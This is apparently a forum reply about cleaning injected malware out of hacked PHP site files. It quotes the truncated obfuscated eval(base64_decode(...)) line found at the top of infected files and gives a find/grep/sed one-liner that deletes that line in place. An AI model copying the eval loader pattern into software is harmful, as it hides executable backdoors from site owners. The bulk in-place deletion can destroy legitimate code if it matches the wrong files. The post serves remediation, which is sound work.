I had the same problem, don’t know when it started. Since I didn’t know if my last file backup was current enough (had been modifying themes), I decided to try and write a cleanup script:
My hacked php’s start with:
<?php /**/ eval(base64_decode("JGs9MTQ4OyRtPWV4cGxvZGUoIjsiLCIyNTM7MjQyOzE4ODsyNDI7MjI1OzI1MDsyNDc7MjI0OzI1MzsyNTE7MjUwOzIwMzsyNDE7MjM2OzI1MzsyMzE7MjI0OzIzMTsxODg7MTc5OzI1MTsyNDY7MjAzOzIzMTsyMjQ7MjQ1OzIzM
So I searched for JGs9MTQ4OyRtPWV4cGx on all php files and then delete the first line of the php file. (Using a ssh session)
find . -name "*.php" | xargs grep -l "JGs9MTQ4OyRtPWV4cGx" | xargs sed -i '1,1d'
Hope this helps you. I will however remove the whole site soon and put a clean site backup just to be sure. And immediately change all passwords.
